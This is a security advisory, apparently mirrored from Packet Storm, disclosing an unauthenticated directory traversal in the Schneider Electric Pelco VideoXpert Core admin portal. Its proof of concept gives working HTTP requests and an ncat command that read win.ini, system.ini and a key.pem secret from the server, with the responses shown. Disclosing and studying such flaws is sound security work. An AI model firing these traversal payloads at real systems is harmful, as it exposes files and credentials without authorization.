Lucene search
K

Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal

🗓️ 11 Jul 2017 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 73 Views

Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal vulnerabilit

Code
`  
Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal  
  
  
Vendor: Schneider Electric SE  
Product web page: https://www.pelco.com  
Affected version: 2.0.41  
1.14.7  
1.12.105  
  
Summary: VideoXpert is a video management solution designed for  
scalability, fitting the needs surveillance operations of any size.  
VideoXpert Ultimate can also aggregate other VideoXpert systems,  
tying multiple video management systems into a single interface.  
  
Desc: Pelco VideoXpert suffers from a directory traversal vulnerability.  
Exploiting this issue will allow an unauthenticated attacker to  
view arbitrary files within the context of the web server.  
  
  
Tested on: Microsoft Windows 7 Professional SP1 (EN)  
Jetty(9.2.6.v20141205)  
MongoDB/3.2.10  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2017-5419  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php  
  
  
05.04.2017  
  
--  
  
  
PoC:  
----  
  
GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1  
Host: 172.19.0.198  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)  
Connection: close  
  
  
HTTP/1.1 200 OK  
Date: Wed, 05 Apr 2017 13:27:39 GMT  
Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT  
Cache-Control: public, max-age=86400  
Content-Type: text/html; charset=UTF-8  
Vary: Accept-Encoding  
ETag: 1247548162000  
Content-Length: 403  
Connection: close  
  
; for 16-bit app support  
[fonts]  
[extensions]  
[mci extensions]  
[files]  
[Mail]  
MAPI=1  
[MCI Extensions.BAK]  
3g2=MPEGVideo  
3gp=MPEGVideo  
3gp2=MPEGVideo  
3gpp=MPEGVideo  
aac=MPEGVideo  
adt=MPEGVideo  
adts=MPEGVideo  
m2t=MPEGVideo  
m2ts=MPEGVideo  
m2v=MPEGVideo  
m4a=MPEGVideo  
m4v=MPEGVideo  
mod=MPEGVideo  
mov=MPEGVideo  
mp4=MPEGVideo  
mp4v=MPEGVideo  
mts=MPEGVideo  
ts=MPEGVideo  
tts=MPEGVideo  
  
  
------  
  
  
GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1  
Host: 172.19.0.198  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)  
Connection: close  
  
  
HTTP/1.1 200 OK  
Date: Thu, 06 Apr 2017 11:59:07 GMT  
Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT  
Cache-Control: public, max-age=86400  
Content-Type: text/html; charset=UTF-8  
ETag: 1491397116000  
Content-Length: 9  
Connection: close  
  
T0ps3cret  
  
  
------  
  
  
bash-4.4$ cat pelco_system_ini.txt  
GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1  
Host: 172.19.0.198  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)  
Connection: close  
  
bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt  
Ncat: Version 7.40 ( https://nmap.org/ncat )  
Ncat: Connected to 172.19.0.198:80.  
HTTP/1.1 200 OK  
Date: Thu, 06 Apr 2017 12:30:01 GMT  
Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT  
Cache-Control: public, max-age=86400  
Content-Type: text/html; charset=UTF-8  
ETag: 1244668084000  
Content-Length: 219  
Connection: close  
  
; for 16-bit app support  
[386Enh]  
woafont=dosapp.fon  
EGA80WOA.FON=EGA80WOA.FON  
EGA40WOA.FON=EGA40WOA.FON  
CGA80WOA.FON=CGA80WOA.FON  
CGA40WOA.FON=CGA40WOA.FON  
  
[drivers]  
wave=mmdrv.dll  
timer=timer.drv  
  
[mci]  
Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds.  
bash-4.4$   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation